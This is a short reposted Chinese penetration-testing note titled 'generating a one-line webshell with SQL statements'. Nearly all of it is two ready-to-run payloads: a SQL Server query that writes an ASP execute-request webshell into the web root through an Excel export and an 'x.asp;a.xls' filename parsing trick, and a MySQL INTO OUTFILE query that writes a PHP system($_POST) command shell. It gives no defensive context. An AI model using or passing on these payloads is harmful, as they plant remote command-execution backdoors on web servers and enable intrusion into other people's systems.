欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

渗透之——SQL语句生成一句话

程序员文章站 2022-07-12 15:30:35
...

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85296880

1、SQLServer执行SQL语句生成一句话

select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master;

NB_master必须是已经存在的表

2、MySQL执行SQL语句生成一句话

select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php";